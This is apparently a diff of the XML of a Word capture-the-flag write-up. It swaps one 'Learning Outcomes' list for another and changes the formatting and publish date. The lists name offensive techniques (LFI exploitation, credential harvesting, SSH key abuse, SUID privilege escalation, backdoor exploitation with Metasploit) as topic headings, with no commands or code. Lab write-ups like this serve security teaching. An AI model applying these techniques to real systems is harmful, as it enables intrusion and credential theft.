-        </w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Learning Outcomes</w:t>
       </w:r>
     </w:p>
@@ -9199,7 +9508,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>This challenge helped in understanding:</w:t>
+        <w:t>This challenge demonstrates:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9207,8 +9516,6 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
@@ -9217,101 +9524,61 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>• Service enumeration and identification</w:t>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Web enumeration techniques</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Exploiting known backdoor vulnerabilities</w:t>
+        <w:t>• LFI exploitation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Using Metasploit for exploitation</w:t>
+        <w:t>• Credential harvesting</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Gaining shell access via IRC service</w:t>
+        <w:t>• SSH key abuse</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Privilege escalation techniques</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This machine highlights how </w:t>
+        <w:t>• Privilege escalation via SUID</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>outdated software can directly lead to full system compromise</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Real-world attack chaining</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16649,7 +16916,7 @@
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <CoverPageProperties xmlns="http://schemas.microsoft.com/office/2006/coverPageProps">
-  <PublishDate>2026-03-18T00:00:00</PublishDate>
+  <PublishDate>2026-03-24T00:00:00</PublishDate>
   <Abstract/>
   <CompanyAddress/>
   <CompanyPhone/>
